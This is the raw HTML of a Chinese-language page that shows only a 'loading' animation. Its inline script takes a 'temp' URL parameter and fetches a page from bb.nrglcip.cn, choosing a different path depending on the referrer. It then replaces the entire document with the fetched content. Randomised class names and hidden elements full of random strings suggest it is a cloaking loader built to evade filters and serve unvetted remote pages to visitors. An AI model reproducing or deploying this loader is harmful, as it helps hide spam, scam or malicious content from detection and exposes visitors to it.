<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .X1Kf0Qb {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .X1Kf0Qb .l8QvsM0r {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .X1Kf0Qb .content {
            line-height: 50px;
            text-align: center
        }

        .X1Kf0Qb .img {
            width: 100%
        }

        .X1Kf0Qb .cUXvXv {
            text-align: center
        }

        .X1Kf0Qb .cUXvXv span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .X1Kf0Qb .cUXvXv span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .X1Kf0Qb .cUXvXv span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .X1Kf0Qb .cUXvXv span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .X1Kf0Qb .cUXvXv span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .X1Kf0Qb .cUXvXv span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .X1Kf0Qb .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function O5uRVROe1T(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var qMhI2yk = O5uRVROe1T('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ qMhI2yk +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ qMhI2yk +".html?a=share";
		}
		
        r4uQ4JE=url+"#"+new Date().getTime();
        r4uQ4JE && function() {
            $.get(r4uQ4JE, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<h1 style='display:none' >tztSWoW76FhEZ2PvN5zGLlSFdSlHvwBNDKqeTKJyNhAsmavyVw7SThSfyfmlrfWB7U06hj2QiWwIwwk0</h1>
<h1 style='display:none' >tztSWoW76FhEZ2PvN5zGLlSFdSlHvwBNDKqeTKJyNhAsmavyVw7SThSfyfmlrfWB7U06hj2QiWwIwwk0</h1>
<a  href='#' style='display:none'>m3SALlgwFDoT8KfQj8pSHsMGDnzT7WBs3Vydzksik1hVqANHlbme33W8E0QdLG</a>
<img  src='' style='display:none'>
<a  href='#' style='display:none'>m3SALlgwFDoT8KfQj8pSHsMGDnzT7WBs3Vydzksik1hVqANHlbme33W8E0QdLG</a>
<li style='display:none' >dWVJU5Bq8zztuteQMNubikZcRx06UNIaEvrxYBZOEczFB3JyqtIUScz1</li>
<h1 style='display:none' >tztSWoW76FhEZ2PvN5zGLlSFdSlHvwBNDKqeTKJyNhAsmavyVw7SThSfyfmlrfWB7U06hj2QiWwIwwk0</h1><div class="X1Kf0Qb">
    <div class="l8QvsM0r">
        <div class="cUXvXv">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<b style='display:none' >oYXAoTtCJ1M</b>
<div style='display:none'>Xsf7tYFv0O8H6Oq7VfzrnstfQl1Git3nVWYCBx8w3VgP6k307mWer8RKCV7XKavxTywTlKBrE4hHfRHCLuSgq8jX</div>
<a  href='#' style='display:none'>NQcNI0BRVGcWeXYmJ1fyKB7Hbeu7du7O1KRZneC6U5uzp</a></body>
</html>